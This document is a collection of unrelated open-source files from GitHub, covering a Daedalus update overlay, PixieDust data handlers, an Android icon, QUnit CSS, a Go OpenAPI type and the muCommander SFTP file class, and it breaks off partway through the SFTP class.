onPostponeUpdate : () => {}; const actionsStyles = classnames([ styles.actions, isLinux && isWaitingToQuitDaedalus ? styles.progressBar : null, ]); return ( <div className={actionsStyles}> {!(isLinux && isWaitingToQuitDaedalus) && ( <> <Checkbox label={intl.formatMessage(messages.checkboxLabel)} onChange={this.toggleAcceptance} className={checkboxStyles} checked={areTermsOfUseAccepted || isWaitingToQuitDaedalus} skin={CheckboxSkin} themeOverrides={styles.checkbox} disabled={isCheckboxDisabled} /> <Button className={buttonStyles} onClick={onInstallUpdate} skin={ButtonSpinnerSkin} loading={isWaitingToQuitDaedalus} label={intl.formatMessage(buttonLabel)} disabled={isButtonDisabled} /> <Link className={postponeLinkStyles} onClick={postponeAction} label={intl.formatMessage(postponeLabel)} skin={LinkSkin} hasIconAfter={false} /> </> )} {isLinux && isWaitingToQuitDaedalus && ( <> <div className={styles.downloadProgressContent}> <p className={styles.downloadProgressLabel}> {intl.formatMessage(messages.installingUpdateLabel)} </p> </div> <ProgressBarLarge progress={installationProgress} /> </> )} </div> ); }; manualUpdateAction = () => { const { intl } = this.context; const { onExternalLinkClick, onPostponeUpdate, isLinux } = this.props; const errorMessage = isLinux ? messages.manualUpdateDescriptionErrorLinux : messages.manualUpdateDescriptionError; return ( <div className={styles.actions}> <div className={styles.manualUpdateDescription}> {intl.formatMessage(errorMessage)} {intl.formatMessage(messages.manualUpdateDescriptionAction)} </div> <Button className={styles.button} onClick={() => onExternalLinkClick( intl.formatMessage(messages.manualUpdateButtonUrl) ) } skin={ButtonSkin} label={ <span> <SVGInline svg={externalLinkIcon} className={styles.externalLinkIcon} /> {intl.formatMessage(messages.manualUpdateButtonLabel)} </span> } /> <Link className={styles.postponeLink} onClick={onPostponeUpdate} label={intl.formatMessage(messages.postponeInstallLinkLabel)} skin={LinkSkin} hasIconAfter={false} /> </div> ); }; render() { const { intl } = this.context; const { update, onClose, isUpdateDownloaded, availableAppVersion, currentAppVersion, isAutomaticUpdateFailed, } = this.props; const { content } = update; let actions; if (isAutomaticUpdateFailed) actions = this.manualUpdateAction(); else if (!isUpdateDownloaded) actions = this.progressActions(); else actions = this.openInstallerAction(); return ( <div className={styles.component} role="presentation" onClick={!isUpdateDownloaded ? onClose : () => {}} > {!isUpdateDownloaded && !isAutomaticUpdateFailed && ( <DialogCloseButton onClose={onClose} className={styles.closeButton} /> )} <h1 className={styles.title}>{intl.formatMessage(messages.title)}</h1> <span className={styles.subtitle}> <FormattedHTMLMessage {...messages.subtitle} values={{ availableAppVersion, currentAppVersion, }} /> </span> <div className={styles.content} role="presentation" onClick={this.contentClickHandler.bind(this)} > <ReactMarkdown escapeHtml={false} source={content} /> </div> {actions} </div> ); } }
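// Editor's note: a hedged usage sketch showing how a container might render
// this overlay. The prop names come from the Props type above, but the
// concrete values and handler names here are hypothetical placeholders.
//
// <AppUpdateOverlay
//   update={newsItem}                 // a News.News instance
//   availableAppVersion="2.1.0"       // hypothetical versions
//   currentAppVersion="2.0.0"
//   downloadProgress={42}
//   downloadTimeLeft="3 minutes"
//   totalDownloaded="120 MB"
//   totalDownloadSize="280 MB"
//   isUpdateDownloaded={false}
//   isAutomaticUpdateFailed={false}
//   isWaitingToQuitDaedalus={false}
//   installationProgress={0}
//   isLinux={false}
//   onClose={hideOverlay}
//   onInstallUpdate={installUpdate}
//   onPostponeUpdate={postponeUpdate}
//   onExternalLinkClick={openExternalLink}
// />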
{ "pile_set_name": "Github" }
# ------------------------------------------------------------------------------- # Copyright IBM Corp. 2017 # # Licensed under the Apache License, Version 2.0 (the 'License'); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ------------------------------------------------------------------------------- from pixiedust.utils.environment import Environment from pixiedust.display.streaming import StreamingDataAdapter import pixiedust.utils.dataFrameMisc as dataFrameMisc from .jsonDataHandler import JSONDataHandler from .pandasDataFrameHandler import PandasDataFrameDataHandler if Environment.hasSpark: from .pysparkDataFrameHandler import PySparkDataFrameDataHandler def isArrayOfDict(entity): if not isinstance(entity, list): return False return all([isinstance(x, dict) for x in entity]) def getDataHandler(options, entity): if dataFrameMisc.isPySparkDataFrame(entity): return PySparkDataFrameDataHandler(options, entity) elif dataFrameMisc.isPandasDataFrame(entity): return PandasDataFrameDataHandler(options, entity) elif isinstance(entity, dict) or isArrayOfDict(entity): return JSONDataHandler(options, entity) elif isinstance(entity, StreamingDataAdapter): return entity.getDisplayDataHandler(options, entity) return None
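# Editor's note: a minimal sketch of the dispatch implemented by
# getDataHandler above; a pandas DataFrame resolves to
# PandasDataFrameDataHandler, while a dict or a list of dicts resolves to
# JSONDataHandler. Passing an empty options dict is an assumption made for
# illustration only.
import pandas as pd

df_handler = getDataHandler({}, pd.DataFrame({'a': [1, 2]}))
assert isinstance(df_handler, PandasDataFrameDataHandler)

json_handler = getDataHandler({}, [{'a': 1}, {'a': 2}])
assert isinstance(json_handler, JSONDataHandler)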
{ "pile_set_name": "Github" }
#import <Foundation/Foundation.h> @interface PodsDummy_AEXML : NSObject @end @implementation PodsDummy_AEXML @end
{ "pile_set_name": "Github" }
package cn.thinkjoy.utils4s.file

import better.files._
import java.io.{File => JFile}

/**
 * Hello world!
 *
 */
object FileApp {
  def main(args: Array[String]): Unit = {
    // TODO: requires Java 8; needs further follow-up
    println("Requires Java 8; needs further follow-up")
  }
}
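// Editor's note: a hedged sketch of the better-files calls this module is set
// up to explore; the file"" interpolator and the methods below are from the
// library's documented surface, and the path is a hypothetical placeholder.
object FileAppSketch {
  import better.files._

  def demo(): Unit = {
    val f: File = file"/tmp/utils4s-demo.txt"
    f.createIfNotExists().overwrite("hello from better-files")
    println(f.contentAsString)
  }
}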
{ "pile_set_name": "Github" }
<vector xmlns:android="http://schemas.android.com/apk/res/android" android:width="24dp" android:height="24dp" android:viewportWidth="24.0" android:viewportHeight="24.0"> <path android:fillColor="#FF000000" android:pathData="M16.5,12c0,-1.77 -1.02,-3.29 -2.5,-4.03v2.21l2.45,2.45c0.03,-0.2 0.05,-0.41 0.05,-0.63zM19,12c0,0.94 -0.2,1.82 -0.54,2.64l1.51,1.51C20.63,14.91 21,13.5 21,12c0,-4.28 -2.99,-7.86 -7,-8.77v2.06c2.89,0.86 5,3.54 5,6.71zM4.27,3L3,4.27 7.73,9L3,9v6h4l5,5v-6.73l4.25,4.25c-0.67,0.52 -1.42,0.93 -2.25,1.18v2.06c1.38,-0.31 2.63,-0.95 3.69,-1.81L19.73,21 21,19.73l-9,-9L4.27,3zM12,4L9.91,6.09 12,8.18L12,4z"/> </vector>
{ "pile_set_name": "Github" }
//
// Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
//

.NetBeans IDE Tutorials
************************************************

- link:index_ru.html[NetBeans IDE Tutorials]
- link:section_ru.html[]
- link:github_nb_screencast_ru.html[Screencast on setting up a GitHub repository with NetBeans IDE]
- link:clearcase_ru.html[Using ClearCase support in NetBeans IDE]
- link:cvs_ru.html[Using CVS support in NetBeans IDE]
- link:git_ru.html[Using Git support in NetBeans IDE]
- link:mercurial-queues_ru.html[Using Mercurial Queues support in NetBeans IDE]
- link:mercurial_ru.html[Using Mercurial support in NetBeans IDE]
- link:subversion_ru.html[Using Subversion support in NetBeans IDE]
- link:install-and-configure-mysql-server_ru.html[Setting up the MySQL database server on Windows]
- link:overview-screencast_ru.html[Overview of NetBeans IDE 8.0]
- link:mysql_ru.html[Connecting to a MySQL database]
- link:java-db_ru.html[Working with the Java DB (Derby) database]
- link:team-servers_ru.html[Working with a Team Server in NetBeans IDE]
- link:oracle-db_ru.html[Connecting to an Oracle database from NetBeans IDE]
- link:platform-screencast_ru.html[Building applications on the NetBeans Platform 6.9]
- link:database-improvements-screencast_ru.html[Screencast: database support in NetBeans IDE]

************************************************
{ "pile_set_name": "Github" }
################################################################################ # # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ################################################################################ welcome = \ \n\ \u001B[1m Custom Karaf Branding Example\u001B[0m (${project.version})\n\ \n\ Hit '\u001B[1m<tab>\u001B[0m' for a list of available commands\n\ and '\u001B[1m[cmd] --help\u001B[0m' for help on a specific command.\n
{ "pile_set_name": "Github" }
package openapi3 import ( "github.com/getkin/kin-openapi/jsoninfo" ) // Example is specified by OpenAPI/Swagger 3.0 standard. type Example struct { ExtensionProps Summary string `json:"summary,omitempty"` Description string `json:"description,omitempty"` Value interface{} `json:"value,omitempty"` ExternalValue string `json:"externalValue,omitempty"` } func NewExample(value interface{}) *Example { return &Example{ Value: value, } } func (example *Example) MarshalJSON() ([]byte, error) { return jsoninfo.MarshalStrictStruct(example) } func (example *Example) UnmarshalJSON(data []byte) error { return jsoninfo.UnmarshalStrictStruct(data, example) }
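// Editor's note: a minimal usage sketch for the Example type above, kept to
// the API defined in this file; the payload value and summary string are
// hypothetical placeholders.
func exampleUsageSketch() ([]byte, error) {
	ex := NewExample(map[string]interface{}{"id": 42})
	ex.Summary = "a sample payload"
	// Serializes the example, preserving any extension properties.
	return ex.MarshalJSON()
}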
{ "pile_set_name": "Github" }
$NetBSD: patch-scores.c,v 1.1 2013/10/10 00:07:23 joerg Exp $ --- scores.c.orig 2013-10-09 23:15:30.000000000 +0000 +++ scores.c @@ -159,11 +159,12 @@ void writecurscore(int col) void drawscores(void) { writenum(scdat[0].score,0,0,6,3); - if (nplayers==2 || diggers==2) + if (nplayers==2 || diggers==2) { if (scdat[1].score<100000l) writenum(scdat[1].score,236,0,6,3); else writenum(scdat[1].score,248,0,6,3); + } } void addscore(int n,Sint4 score)
{ "pile_set_name": "Github" }
/*! * QUnit 1.16.0 * http://qunitjs.com/ * * Copyright 2006, 2014 jQuery Foundation and other contributors * Released under the MIT license * http://jquery.org/license * * Date: 2014-12-03T16:32Z */ /** Font Family and Sizes */ #qunit-tests, #qunit-header, #qunit-banner, #qunit-testrunner-toolbar, #qunit-userAgent, #qunit-testresult { font-family: "Helvetica Neue Light", "HelveticaNeue-Light", "Helvetica Neue", Calibri, Helvetica, Arial, sans-serif; } #qunit-testrunner-toolbar, #qunit-userAgent, #qunit-testresult, #qunit-tests li { font-size: small; } #qunit-tests { font-size: smaller; } /** Resets */ #qunit-tests, #qunit-header, #qunit-banner, #qunit-userAgent, #qunit-testresult, #qunit-modulefilter { margin: 0; padding: 0; } /** Header */ #qunit-header { padding: 0.5em 0 0.5em 1em; color: #8699A4; background-color: #0D3349; font-size: 1.5em; line-height: 1em; font-weight: 400; border-radius: 5px 5px 0 0; } #qunit-header a { text-decoration: none; color: #C2CCD1; } #qunit-header a:hover, #qunit-header a:focus { color: #FFF; } #qunit-testrunner-toolbar label { display: inline-block; padding: 0 0.5em 0 0.1em; } #qunit-banner { height: 5px; } #qunit-testrunner-toolbar { padding: 0.5em 1em 0.5em 1em; color: #5E740B; background-color: #EEE; overflow: hidden; } #qunit-userAgent { padding: 0.5em 1em 0.5em 1em; background-color: #2B81AF; color: #FFF; text-shadow: rgba(0, 0, 0, 0.5) 2px 2px 1px; } #qunit-modulefilter-container { float: right; } /** Tests: Pass/Fail */ #qunit-tests { list-style-position: inside; } #qunit-tests li { padding: 0.4em 1em 0.4em 1em; border-bottom: 1px solid #FFF; list-style-position: inside; } #qunit-tests > li { display: none; } #qunit-tests li.pass, #qunit-tests li.running, #qunit-tests li.fail { display: list-item; } #qunit-tests.hidepass li.pass, #qunit-tests.hidepass li.running { display: none; } #qunit-tests li strong { cursor: pointer; } #qunit-tests li.skipped strong { cursor: default; } #qunit-tests li a { padding: 0.5em; color: #C2CCD1; text-decoration: none; } #qunit-tests li a:hover, #qunit-tests li a:focus { color: #000; } #qunit-tests li .runtime { float: right; font-size: smaller; } .qunit-assert-list { margin-top: 0.5em; padding: 0.5em; background-color: #FFF; border-radius: 5px; } .qunit-collapsed { display: none; } #qunit-tests table { border-collapse: collapse; margin-top: 0.2em; } #qunit-tests th { text-align: right; vertical-align: top; padding: 0 0.5em 0 0; } #qunit-tests td { vertical-align: top; } #qunit-tests pre { margin: 0; white-space: pre-wrap; word-wrap: break-word; } #qunit-tests del { background-color: #E0F2BE; color: #374E0C; text-decoration: none; } #qunit-tests ins { background-color: #FFCACA; color: #500; text-decoration: none; } /*** Test Counts */ #qunit-tests b.counts { color: #000; } #qunit-tests b.passed { color: #5E740B; } #qunit-tests b.failed { color: #710909; } #qunit-tests li li { padding: 5px; background-color: #FFF; border-bottom: none; list-style-position: inside; } /*** Passing Styles */ #qunit-tests li li.pass { color: #3C510C; background-color: #FFF; border-left: 10px solid #C6E746; } #qunit-tests .pass { color: #528CE0; background-color: #D2E0E6; } #qunit-tests .pass .test-name { color: #366097; } #qunit-tests .pass .test-actual, #qunit-tests .pass .test-expected { color: #999; } #qunit-banner.qunit-pass { background-color: #C6E746; } /*** Failing Styles */ #qunit-tests li li.fail { color: #710909; background-color: #FFF; border-left: 10px solid #EE5757; white-space: pre; } #qunit-tests > li:last-child { 
border-radius: 0 0 5px 5px; } #qunit-tests .fail { color: #000; background-color: #EE5757; } #qunit-tests .fail .test-name, #qunit-tests .fail .module-name { color: #000; } #qunit-tests .fail .test-actual { color: #EE5757; } #qunit-tests .fail .test-expected { color: #008000; } #qunit-banner.qunit-fail { background-color: #EE5757; } /*** Skipped tests */ #qunit-tests .skipped { background-color: #EBECE9; } #qunit-tests .qunit-skipped-label { background-color: #F4FF77; display: inline-block; font-style: normal; color: #366097; line-height: 1.8em; padding: 0 0.5em; margin: -0.4em 0.4em -0.4em 0; } /** Result */ #qunit-testresult { padding: 0.5em 1em 0.5em 1em; color: #2B81AF; background-color: #D2E0E6; border-bottom: 1px solid #FFF; } #qunit-testresult .module-name { font-weight: 700; } /** Fixture */ #qunit-fixture { position: absolute; top: -10000px; left: -10000px; width: 1000px; height: 1000px; }
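/*
 * Editor's note: the selectors above target QUnit's standard harness markup;
 * a minimal host page looks like the sketch below (the usual QUnit 1.x
 * layout, with file names assumed to sit next to this stylesheet):
 *
 *   <link rel="stylesheet" href="qunit.css">
 *   <div id="qunit"></div>
 *   <div id="qunit-fixture"></div>
 *   <script src="qunit.js"></script>
 *   <script src="tests.js"></script>
 */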
{ "pile_set_name": "Github" }
/** * This file is part of muCommander, http://www.mucommander.com * * muCommander is free software; you can redistribute it and/or modify * it under the terms of the GNU Lesser General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * muCommander is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ package com.mucommander.commons.file.protocol.sftp; import java.io.FilterInputStream; import java.io.FilterOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.util.ArrayList; import java.util.Collections; import java.util.List; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import com.jcraft.jsch.ChannelSftp; import com.jcraft.jsch.ChannelSftp.LsEntry; import com.jcraft.jsch.SftpATTRS; import com.jcraft.jsch.SftpException; import com.mucommander.commons.file.AbstractFile; import com.mucommander.commons.file.AuthException; import com.mucommander.commons.file.FileFactory; import com.mucommander.commons.file.FileOperation; import com.mucommander.commons.file.FilePermissions; import com.mucommander.commons.file.FileURL; import com.mucommander.commons.file.PermissionAccess; import com.mucommander.commons.file.PermissionBits; import com.mucommander.commons.file.PermissionType; import com.mucommander.commons.file.SimpleFilePermissions; import com.mucommander.commons.file.SyncedFileAttributes; import com.mucommander.commons.file.UnsupportedFileOperation; import com.mucommander.commons.file.UnsupportedFileOperationException; import com.mucommander.commons.file.connection.ConnectionHandler; import com.mucommander.commons.file.connection.ConnectionPool; import com.mucommander.commons.file.protocol.FileProtocols; import com.mucommander.commons.file.protocol.ProtocolFile; import com.mucommander.commons.io.ByteCounter; import com.mucommander.commons.io.ByteUtils; import com.mucommander.commons.io.CounterOutputStream; import com.mucommander.commons.io.RandomAccessInputStream; import com.mucommander.commons.io.RandomAccessOutputStream; /** * SFTPFile provides access to files located on an SFTP server. * * <p>The associated {@link FileURL} scheme is {@link FileProtocols#SFTP}. The host part of the URL designates the * SFTP server. Credentials must be specified in the login and password parts as SFTP servers require a login and * password. The path separator is <code>'/'</code>.</p> * * <p>Here are a few examples of valid SFTP URLs: * <code> * sftp://server/pathto/somefile<br> * sftp://login:password@server/pathto/somefile<br> * </code> * </p> * * <p>Internally, SFTPFile uses {@link ConnectionPool} to create SFTP connections as needed and allows them to be * reused by SFTPFile instances located on the same server, dealing with concurrency issues. 
Connections are * thus managed transparently and need not be manually managed.</p> * * <p>Low-level SFTP implementation is provided by the <code>JSCH</code> library distributed under the BSD license.</p> * * @see ConnectionPool * @author Maxence Bernard, Arik Hadas */ public class SFTPFile extends ProtocolFile { private static final Logger LOGGER = LoggerFactory.getLogger(SFTPFile.class); /** The absolute path to the file on the remote server, not the full URL */ private String absPath; /** Contains the file attribute values */ private SFTPFileAttributes fileAttributes; /** Cached parent file instance, null if not created yet or if this file has no parent */ private AbstractFile parent; /** Has the parent file been determined yet? */ private boolean parentValSet; /** Cached canonical path value, null if the canonical path hasn't been fetched yet */ private String canonicalPath; /** Timestamp when the canonical path value was fetched */ private long canonicalPathFetchedTime; /** Period of time during which file attributes are cached, before being fetched again from the server. */ private static long attributeCachingPeriod = 60000; /** a SFTPConnectionHandlerFactory instance */ private final static SFTPConnectionHandlerFactory connHandlerFactory = new SFTPConnectionHandlerFactory(); /** Name of the property that holds the path to a private key. This property is optional; if it is set, private key * authentication is used. */ public final static String PRIVATE_KEY_PATH_PROPERTY_NAME = "privateKeyPath"; private final static String SEPARATOR = DEFAULT_SEPARATOR; /** * Creates a new instance of SFTPFile and initializes the SSH/SFTP connection to the server. */ protected SFTPFile(FileURL fileURL) throws IOException { this(fileURL, null); } protected SFTPFile(FileURL fileURL, SFTPFileAttributes fileAttributes) throws IOException { super(fileURL); // // Throw an AuthException if the url doesn't contain any credentials // if(!fileURL.containsCredentials()) // throw new AuthException(fileURL); this.absPath = fileURL.getPath(); if(fileAttributes==null) this.fileAttributes = new SFTPFileAttributes(fileURL); else this.fileAttributes = fileAttributes; } /** * Sets the time period during which attributes values (e.g. isDirectory, last modified, ...) are cached. * The higher this value, the lower the number of network requests but also the longer it takes * before those attributes can be refreshed. A value of <code>0</code> disables attributes caching. * * <p>This class ensures that the attributes changed remotely by one of its methods are always updated locally, even * with attributes caching enabled. To illustrate, after a call to {@link #mkdir()}, {@link #isDirectory()} will * return <code>true</code>, even if the attributes haven't been refreshed. The attributes will however not be * consistent if they have been changed by another {@link SFTPFile} or by another process, and will remain * inconsistent for up to <code>period</code> milliseconds. * * @param period time period during which attributes values are cached, in milliseconds. 0 disables attributes caching. 
*/ public static void setAttributeCachingPeriod(long period) { attributeCachingPeriod = period; } private OutputStream getOutputStream(boolean append) throws IOException { // Retrieve a ConnectionHandler and lock it final SFTPConnectionHandler connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true); try { // Makes sure the connection is started, if not starts it connHandler.checkConnection(); OutputStream outputStream; if(exists()) { outputStream = connHandler.channelSftp.put(absPath, append ? ChannelSftp.APPEND : ChannelSftp.OVERWRITE); // Update local attributes if(!append) fileAttributes.setSize(0); } else { outputStream = connHandler.channelSftp.put(absPath); // Update local attributes fileAttributes.setExists(true); fileAttributes.setDate(System.currentTimeMillis()); fileAttributes.setSize(0); } return new CounterOutputStream( new SFTPOutputStream(outputStream, connHandler), new ByteCounter() { @Override public synchronized void add(long nbBytes) { fileAttributes.addToSize(nbBytes); fileAttributes.setDate(System.currentTimeMillis()); } } ); } catch(IOException e) { // Release the lock on the ConnectionHandler if the OutputStream could not be created connHandler.releaseLock(); // Re-throw IOException throw e; } catch (SftpException e) { // TODO Auto-generated catch block e.printStackTrace(); return null; } } ///////////////////////////////////////////// // ConnectionHandlerFactory implementation // ///////////////////////////////////////////// public ConnectionHandler createConnectionHandler(FileURL location) { return new SFTPConnectionHandler(location); } ///////////////////////////////// // AbstractFile implementation // ///////////////////////////////// /** * Implementation note: the value returned by this method will always be <code>false</code> if this file was * created by the public constructor. If this file was created by the private constructor (by {@link #ls()}, * the value will be accurate (<code>true</code> if this file is a symlink) but will never get updated. * See {@link com.mucommander.commons.file.protocol.sftp.SFTPFile.SFTPFileAttributes} for more information. */ @Override public boolean isSymlink() { return fileAttributes.isSymlink(); } @Override public boolean isSystem() { return false; } /** * Implementation note: for symlinks, returns the date of the link's target. */ @Override public long getDate() { return ((SFTPFileAttributes)getCanonicalFile().getUnderlyingFileObject()).getDate(); } @Override public void changeDate(long lastModified) throws IOException, UnsupportedFileOperationException { SFTPConnectionHandler connHandler = null; try { // Retrieve a ConnectionHandler and lock it connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true); // Makes sure the connection is started, if not starts it connHandler.checkConnection(); connHandler.channelSftp.setMtime(absPath, (int)(lastModified/1000)); // Update local attribute copy fileAttributes.setDate(lastModified); } catch (SftpException e) { LOGGER.error("failed to change the modification date of " + absPath, e); } finally { // Release the lock on the ConnectionHandler if(connHandler!=null) connHandler.releaseLock(); } } /** * Implementation note: for symlinks, returns the size of the link's target. 
*/ @Override public long getSize() { return ((SFTPFileAttributes)getCanonicalFile().getUnderlyingFileObject()).getSize(); } @Override public AbstractFile getParent() { if(!parentValSet) { FileURL parentFileURL = this.fileURL.getParent(); if(parentFileURL!=null) { parent = FileFactory.getFile(parentFileURL); // Note: parent may be null if it can't be resolved } parentValSet = true; } return parent; } @Override public void setParent(AbstractFile parent) { this.parent = parent; this.parentValSet = true; } /** * Implementation note: for symlinks, returns the value of the link's target. */ @Override public boolean exists() { return fileAttributes.exists(); } /** * Implementation note: for symlinks, returns the permissions of the link's target. */ @Override public FilePermissions getPermissions() { return ((SFTPFileAttributes)getCanonicalFile().getUnderlyingFileObject()).getPermissions(); } @Override public PermissionBits getChangeablePermissions() { return PermissionBits.FULL_PERMISSION_BITS; // Full permission support (777 octal) } @Override public void changePermission(PermissionAccess access, PermissionType permission, boolean enabled) throws IOException { changePermissions(ByteUtils.setBit(getPermissions().getIntValue(), (permission.toInt() << (access.toInt()*3)), enabled)); } @Override public String getOwner() { return fileAttributes.getOwner(); } @Override public boolean canGetOwner() { return true; } @Override public String getGroup() { return fileAttributes.getGroup(); } @Override public boolean canGetGroup() { return true; } /** * Implementation note: for symlinks, returns the value of the link's target. */ @Override public boolean isDirectory() { return fileAttributes.isDirectory(); } @Override public InputStream getInputStream() throws IOException { return getInputStream(0); } @Override public OutputStream getOutputStream() throws IOException { return getOutputStream(false); } @Override public OutputStream getAppendOutputStream() throws IOException { return getOutputStream(true); } @Override public RandomAccessInputStream getRandomAccessInputStream() throws IOException { return new SFTPRandomAccessInputStream(); } @Override public void delete() throws IOException { // Retrieve a ConnectionHandler and lock it SFTPConnectionHandler connHandler = null; try { // Retrieve a ConnectionHandler and lock it connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true); // Makes sure the connection is started, if not starts it connHandler.checkConnection(); if(isDirectory()) connHandler.channelSftp.rmdir(absPath); else connHandler.channelSftp.rm(absPath); // Update local attributes fileAttributes.setExists(false); fileAttributes.setDirectory(false); fileAttributes.setSymlink(false); fileAttributes.setSize(0); } catch (SftpException e) { e.printStackTrace(); } finally { // Release the lock on the ConnectionHandler if the OutputStream could not be created if(connHandler!=null) connHandler.releaseLock(); } } @SuppressWarnings("unchecked") @Override public AbstractFile[] ls() throws IOException { // Retrieve a ConnectionHandler and lock it SFTPConnectionHandler connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true); List<LsEntry> files = new ArrayList<LsEntry>(); try { // Makes sure the connection is started, if not starts it connHandler.checkConnection(); files = connHandler.channelSftp.ls(absPath); } catch (SftpException e) { // TODO Auto-generated catch block e.printStackTrace(); } finally { // 
Release the lock on the ConnectionHandler connHandler.releaseLock(); } int nbFiles = files.size(); // File doesn't exist, return an empty file array if(nbFiles==0) return new AbstractFile[] {}; AbstractFile children[] = new AbstractFile[nbFiles]; FileURL childURL; String filename; int fileCount = 0; String parentPath = fileURL.getPath(); if(!parentPath .endsWith(SEPARATOR)) parentPath += SEPARATOR; // Fill AbstractFile array and discard '.' and '..' files for (LsEntry file : files) { filename = file.getFilename(); // Discard '.' and '..' files, dunno why these are returned if (filename.equals(".") || filename.equals("..")) continue; childURL = (FileURL) fileURL.clone(); childURL.setPath(parentPath + filename); children[fileCount++] = FileFactory.getFile(childURL, this, Collections.singletonMap("attributes", new SFTPFileAttributes(childURL, file.getAttrs()))); } // Create new array of the exact file count if(fileCount<nbFiles) { AbstractFile newChildren[] = new AbstractFile[fileCount]; System.arraycopy(children, 0, newChildren, 0, fileCount); return newChildren; } return children; } @Override public void mkdir() throws IOException { // Retrieve a ConnectionHandler and lock it SFTPConnectionHandler connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true); try { // Makes sure the connection is started, if not starts it connHandler.checkConnection(); connHandler.channelSftp.mkdir(absPath); // Update local attributes fileAttributes.setExists(true); fileAttributes.setDirectory(true); fileAttributes.setDate(System.currentTimeMillis()); fileAttributes.setSize(0); } catch (SftpException e) { // TODO Auto-generated catch block e.printStackTrace(); } finally { // Release the lock on the ConnectionHandler connHandler.releaseLock(); } } /** * Implementation notes: server-to-server renaming will work if the destination file also uses the 'SFTP' scheme * and is located on the same host. */ @Override public void renameTo(AbstractFile destFile) throws IOException { // Throw an exception if the file cannot be renamed to the specified destination. // Fail in situations where SFTPFile#renameTo() does not, for instance when the source and destination are the same. checkRenamePrerequisites(destFile, true, false); // Retrieve a ConnectionHandler and lock it SFTPConnectionHandler connHandler = null; try { connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true); // Makes sure the connection is started, if not starts it connHandler.checkConnection(); // SftpClient#rename() throws an IOException if the destination exists (instead of overwriting the file) if(destFile.exists()) destFile.delete(); // Will throw an IOException if the operation failed connHandler.channelSftp.rename(absPath, destFile.getURL().getPath()); // Update destination file attributes by fetching them from the server ((SFTPFileAttributes)destFile.getUnderlyingFileObject()).fetchAttributes(); // Update this file's attributes locally fileAttributes.setExists(false); fileAttributes.setDirectory(false); fileAttributes.setSize(0); } catch (SftpException e) { // TODO Auto-generated catch block e.printStackTrace(); } finally { // Release the lock on the ConnectionHandler if(connHandler!=null) connHandler.releaseLock(); } } /** * Returns a {@link com.mucommander.commons.file.protocol.sftp.SFTPFile.SFTPFileAttributes} instance corresponding to this file. 
 */
    @Override
    public Object getUnderlyingFileObject() {
        return fileAttributes;
    }


    // Unsupported file operations

    /**
     * Always throws an {@link UnsupportedFileOperationException}: random write access is not supported.
     */
    @Override
    @UnsupportedFileOperation
    public RandomAccessOutputStream getRandomAccessOutputStream() throws UnsupportedFileOperationException {
        throw new UnsupportedFileOperationException(FileOperation.RANDOM_WRITE_FILE);
    }

    /**
     * Always throws an {@link UnsupportedFileOperationException} when called.
     *
     * @throws UnsupportedFileOperationException always
     */
    @Override
    @UnsupportedFileOperation
    public void copyRemotelyTo(AbstractFile destFile) throws UnsupportedFileOperationException {
        throw new UnsupportedFileOperationException(FileOperation.COPY_REMOTELY);
    }

    /**
     * Always throws an {@link UnsupportedFileOperationException} when called.
     *
     * @throws UnsupportedFileOperationException always
     */
    @Override
    @UnsupportedFileOperation
    public long getFreeSpace() throws UnsupportedFileOperationException {
        throw new UnsupportedFileOperationException(FileOperation.GET_FREE_SPACE);
    }

    /**
     * Always throws an {@link UnsupportedFileOperationException} when called.
     *
     * @throws UnsupportedFileOperationException always
     */
    @Override
    @UnsupportedFileOperation
    public long getTotalSpace() throws UnsupportedFileOperationException {
        throw new UnsupportedFileOperationException(FileOperation.GET_TOTAL_SPACE);
    }


    ////////////////////////
    // Overridden methods //
    ////////////////////////

    @Override
    public void changePermissions(int permissions) throws IOException {
        // Retrieve a ConnectionHandler and lock it
        SFTPConnectionHandler connHandler = null;
        try {
            connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true);

            // Makes sure the connection is started, if not starts it
            connHandler.checkConnection();

            connHandler.channelSftp.chmod(permissions, absPath);
            // Update local attribute copy
            fileAttributes.setPermissions(new SimpleFilePermissions(permissions));
        }
        catch (SftpException e) {
            // Surface the failure to the caller instead of swallowing it
            // (this was previously a TODO auto-generated catch block)
            throw new IOException("Failed to change permissions of " + absPath, e);
        }
        finally {
            // Release the lock on the ConnectionHandler
